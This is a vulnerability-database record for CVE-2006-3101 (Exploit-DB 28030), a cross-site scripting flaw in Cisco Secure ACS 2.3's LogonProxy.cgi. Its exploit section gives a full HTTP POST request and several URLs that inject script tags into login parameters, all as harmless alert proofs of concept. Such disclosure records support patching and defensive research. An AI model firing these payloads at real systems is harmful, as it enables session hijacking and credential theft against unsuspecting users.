ID
VAR-E-200606-0457
CVE
cve_id: | CVE-2006-3101 | Trust: 1.6 |
EDB ID
28030
TITLE
Cisco Secure ACS 2.3 - 'LoginProxy.cgi' Cross-Site Scripting - Unix remote Exploit
Trust: 0.6
DESCRIPTION
Cisco Secure ACS 2.3 - 'LoginProxy.cgi' Cross-Site Scripting. CVE-2006-3101CVE-26531 . remote exploit for Unix platform
Trust: 0.6
AFFECTED PRODUCTS
vendor: | cisco | model: | secure acs | scope: | eq | version: | 2.3 | Trust: 1.0 |
vendor: | cisco | model: | secure acs for unix | scope: | eq | version: | 2.3 | Trust: 0.3 |
EXPLOIT
source: https://www.securityfocus.com/bid/18449/info
Cisco Secure ACS is prone to a cross-site scripting vulnerability. This issue is due to a failure in the application to properly sanitize user-supplied input.
An attacker may leverage this issue to have arbitrary script code execute in the browser of an unsuspecting user in the context of the affected site. This may help the attacker steal cookie-based authentication credentials and launch other attacks.
This issue affects Cisco Secure ACS version 2.3 for UNIX; other versions may also be vulnerable.
POST http://www.example.com:80/CScgi/LogonProxy.cgi HTTP/1.0
Accept: image/gif, image/x-xbitmap, image/jpeg, image/pjpeg, application/x-shockwave-flash, */*
Referer: http://10.17.12.184/cs/index.html
Accept-Language: en-gb
Content-Type: application/x-www-form-urlencoded
Proxy-Connection: Keep-Alive
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.0.3705; .NET CLR 1.1.4322)
Host: 10.17.12.184
Content-Length: 33
Pragma: no-cache
Server=0.0.0.0&error=<script>alert("help")</script>
http://www.example.com/CScgi/LogonProxy.cgi?Server=0.0.0.0&error=<script>alert("help")</script>
http://www.example.com/CScgi/LogonProxy.cgi?Server=10.17.12.184/Logon?null&SSL=<script>alert('help')</script>
http://www.example.com/CScgi/LogonProxy.cgi?Ok=<script>alert('help')</script>
Trust: 1.0
EXPLOIT LANGUAGE
txt
Trust: 0.6
PRICE
free
Trust: 0.6
TYPE
'LoginProxy.cgi' Cross-Site Scripting
Trust: 1.0
CREDITS
Thomas Liam Romanis
Trust: 0.6
EXTERNAL IDS
db: | BID | id: | 18449 | Trust: 2.5 |
db: | EXPLOIT-DB | id: | 28030 | Trust: 1.9 |
db: | NVD | id: | CVE-2006-3101 | Trust: 1.6 |
db: | EDBNET | id: | 82945 | Trust: 0.6 |
db: | EDBNET | id: | 49874 | Trust: 0.6 |
REFERENCES
url: | https://nvd.nist.gov/vuln/detail/cve-2006-3101 | Trust: 1.6 |
url: | https://www.securityfocus.com/bid/18449/info | Trust: 1.0 |
url: | https://www.intelligentexploit.com | Trust: 0.6 |
url: | https://www.exploit-db.com/exploits/28030/ | Trust: 0.6 |
url: | http://www.cisco.com/en/us/products/sw/voicesw/ps4625/index.html | Trust: 0.3 |
url: | https://www.exploit-db.com/exploits/28030 | Trust: 0.3 |
SOURCES
db: | BID | id: | 18449 |
db: | EXPLOIT-DB | id: | 28030 |
db: | EDBNET | id: | 82945 |
db: | EDBNET | id: | 49874 |
LAST UPDATE DATE
2022-07-27T09:31:36.761000+00:00
SOURCES UPDATE DATE
db: | BID | id: | 18449 | date: | 2006-06-16T15:56:00 |
SOURCES RELEASE DATE
db: | BID | id: | 18449 | date: | 2006-06-15T00:00:00 |
db: | EXPLOIT-DB | id: | 28030 | date: | 2006-06-15T00:00:00 |
db: | EDBNET | id: | 82945 | date: | 2006-06-28T00:00:00 |
db: | EDBNET | id: | 49874 | date: | 2006-06-15T00:00:00 |